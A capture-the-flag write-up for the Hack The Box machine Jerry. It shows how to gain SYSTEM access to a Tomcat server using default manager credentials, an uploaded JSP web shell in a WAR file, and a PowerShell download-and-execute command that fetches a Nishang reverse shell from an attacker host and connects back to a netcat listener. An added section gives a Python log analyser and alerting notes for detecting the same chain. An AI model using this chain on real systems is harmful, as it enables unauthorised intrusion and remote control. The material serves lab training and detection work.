HTB (Jerry) Write-Up, No Metasploit

Quick write-up on Jerry from HTB.

nmap -sC -sV 10.10.10.95

It returns Tomcat on port 8080.


Go to 10.10.10.95:8080 and check it out. Server Status asks for a password; admin:admin works. Nothing too crazy there, so try the Manager App link.


admin:admin doesn't work here. The 404 page says the default is tomcat:s3cret. Clear your cache and that works. It could also be brute-forced with hydra; SecLists from GitHub has a wordlist specific to Tomcat.


If you scroll down you see that you can upload WAR files. I think Kali comes with one by default you could try, in the directory /usr/share/webshells/, but I just googled for JSP shells and found this: https://gist.github.com/nikallass/5ceef8c8c02d58ca2c69a29a92d2f461. I clicked on Raw,

curl https://gist.githubusercontent.com/nikallass/5ceef8c8c02d58ca2c69a29a92d2f461/raw/8656cc80ace93c8095b0c7d0c45b917d542fed5c/cmd.jsp > cmd.jsp

and was able to download it. The server only accepts WAR files, so run this in bash:

zip cmd.war cmd.jsp

Upload the file, then go to server:8080/cmd/cmd.jsp

and you should see this


whoami shows you have code execution as SYSTEM, nice. This machine is 64-bit according to the page that allows WAR file uploads.


So you have to run 64-bit PowerShell. Googling the 64-bit PowerShell path shows this 64-bit version: C:\Windows\System32\WindowsPowerShell\v1.0\. Get Nishang if you don't already have it:

git clone https://github.com/samratashok/nishang

Use the following shell, found in the Nishang Shells directory: Invoke-PowerShellTcp.ps1. Edit the script to run the function along with the port you're going to be listening on with netcat.


Serve the script up with a Python HTTP server (I renamed the PS script to shell):

python3 -m http.server 80

Set up a netcat listener on the port you specified in the PowerShell script:

nc -lvnp 9000

Run the following command on the JSP page:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).downloadString('http://10.10.14.32:80/Shell.ps1')

This runs 64-bit PowerShell with a one-line command that downloads the PowerShell script, imports it and runs the function specified.


After the command is run you should also see a GET request on your Python web server, and last a shell on your netcat listener.
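From the defender's side, the chain above leaves a clear trail in the Tomcat access log: 401/403 responses on /manager, a successful POST to /manager/html/upload, then requests to a .jsp under a context that did not exist before. The following is an added example, not part of the original write-up, that flags that pattern over constructed log lines; the baseline context list and the sample log are assumptions.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common"/"combined" pattern: host ident authuser [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumed baseline: contexts a stock Tomcat ships with; any other context serving a .jsp is suspect.
BASELINE_CONTEXTS = frozenset({"/", "/manager", "/host-manager", "/docs", "/examples"})

# Constructed sample log: manager probing, a successful GUI WAR upload, then hits on the new context.
SAMPLE_LOG = """\
10.10.14.32 - - [14/Jul/2018:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.32 - admin [14/Jul/2018:10:01:10 +0000] "GET /manager/html HTTP/1.1" 403 3022
10.10.14.32 - tomcat [14/Jul/2018:10:02:15 +0000] "GET /manager/html HTTP/1.1" 200 19877
10.10.14.32 - tomcat [14/Jul/2018:10:03:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 20120
10.10.14.32 - - [14/Jul/2018:10:04:01 +0000] "GET /cmd/cmd.jsp HTTP/1.1" 200 1042
10.10.14.32 - - [14/Jul/2018:10:04:30 +0000] "POST /cmd/cmd.jsp HTTP/1.1" 200 1312
"""

def analyze(log_text, baseline=BASELINE_CONTEXTS, auth_fail_threshold=2):
    """Return (source_ip, description) findings for the manager-deploy-then-JSP pattern."""
    findings = []
    auth_failures = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, user, method = m["src"], m["user"], m["method"]
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        # Repeated 401/403 on the manager app: credential guessing against manager-gui/manager-script.
        if path.startswith("/manager") and status in (401, 403):
            auth_failures[src] += 1
            if auth_failures[src] == auth_fail_threshold:
                findings.append((src, "repeated manager auth failures"))
        # A successful deploy: GUI upload (POST .../html/upload) or text API (PUT .../text/deploy).
        if status == 200 and (
            (method == "POST" and path == "/manager/html/upload")
            or (method == "PUT" and path == "/manager/text/deploy")
        ):
            findings.append((src, f"WAR deployed via manager as user {user}"))
        # Execution of a JSP under a context that is not part of the known baseline.
        parts = path.lstrip("/").split("/", 1)
        ctx = "/" + parts[0] if len(parts) > 1 else "/"
        if path.endswith(".jsp") and ctx not in baseline:
            findings.append((src, f"JSP request in non-baseline context {ctx}: {method} {path}"))
    return findings
```

On the Windows host the same chain shows up as powershell.exe spawned by Tomcat's java.exe with a download string on its command line, which is the second place to alert.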


And that's it!